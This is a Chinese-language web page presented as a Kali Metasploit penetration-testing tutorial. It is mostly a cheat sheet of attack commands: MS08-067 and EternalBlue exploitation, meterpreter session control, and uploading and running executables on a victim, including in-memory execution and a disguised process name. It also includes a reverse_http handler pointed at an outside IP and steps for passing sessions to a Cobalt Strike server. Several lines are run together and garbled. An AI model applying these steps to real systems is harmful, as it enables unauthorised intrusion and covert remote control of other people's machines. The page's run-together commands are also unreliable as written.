渗透测试教程之 kali MSF
来源:admin
发布时间:2022-08-19 11:48:52
点击数:
推荐关注
#初次使用:
service postgresql start # 启动数据库服务
msfdb init # 初始化数据库
#之后使用:
msfconsole # 启动metasploit
#查看帮助选项
help
#search - 查看漏洞:
search ms08_067
#use - 使用漏洞:
use exploit/windows/smb/ms08_067_netapi
#show - 查看可以攻击的靶机操作系统型号(targets):
show targets
#set - 设置target 参数(xx是对应被攻击靶机的型号):
set target xx
#set - 设置rhost参数(攻击靶机的ip地址):
set rhost 192.168.xxx.xxx
#show - 查看参数:
show options
#进行攻击:
exploit
在内网,反弹shell可以直接链接到本机IP,在外网,如果端口转发,回连的IP为外网IP,回连的端口为外网端口
use auxiliary/scanner/smb/smb_ms17_010
use exploit/windows/smb/ms17_010_eternalblue show options
set rhost 192.168.148.137#设置payload等set lhost 192.168.148.134set lport 4444run
set SessionExpirationTimeout 0
#查看目标
sessions -i
#选择目标
sessions -i id
#批量执行命令
sessions -c cmd
#批量执行命令
sessions -C "meterpreter_cmd"
#从选择的目标返回
background
#退出session,而且关闭所有meterpreter
exit
/usr/share/metasploit-framework/modules/exploits/windows/smb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb
reload_allreloaduse exploit/windows/smb/eternalblue_doublepulsarshow options
wine -h
set processinject explorer.exe
upload 1.exe c:\\ls\\
download c:\\ls\\1.exe
execute -H -i -f cmd.exeexecute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt"#-d 在目标主机执行时显示的进程名称(用以伪装)#-m 直接从内存中执行#"-o 2.txt"1.exe的运行参数
# 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyyportfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx#查看指定端口开放情况netstat -an | grep"yyyy"
[-] Error running command upload: Rex::TimeoutError Operation timed out.
最重要的是module,module中包含各个模块,可以调用与互相调用。
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info={})
super(update_info(info,
'Name' => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
'Description' => %q{
Say something that the user might need to know
},
'License' => MSF_LICENSE,
'Author' => [ 'Name' ],
'References' =>
[
[ 'URL', '' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'System or software version',
{
'Ret' => 0x41414141 # This will be available in `target.ret`
}
]
],
'Payload' => {
'BadChars' => "\x00"
},
'Arch' => ARCH_ARMLE,
'Privileged' => false,
'DisclosureDate' => "",
'DefaultTarget' => 0))
end
def check
# For the check command
end
def exploit
# Main function
end
end
/opt/metasploit-framework/embedded/framework/modules/exploits/xxx(你取的文件夹名)/xxx.rb(你的文件)
reload_allreload
#msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http #(这里注意不是TCP,cs4.2我没找到外连TCP的) set lhost 103.234.72.5 set lport 10086 show options exploit
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set LHOST 103.234.72.5 //cs主机地址 set LPORT 84 //随意设置监听端口,需要和cs保持一致 set session 2 //设置需要派送的meterpreter set DisablePayloadHandler true //禁止产生一个新的handler
CS+MSF总结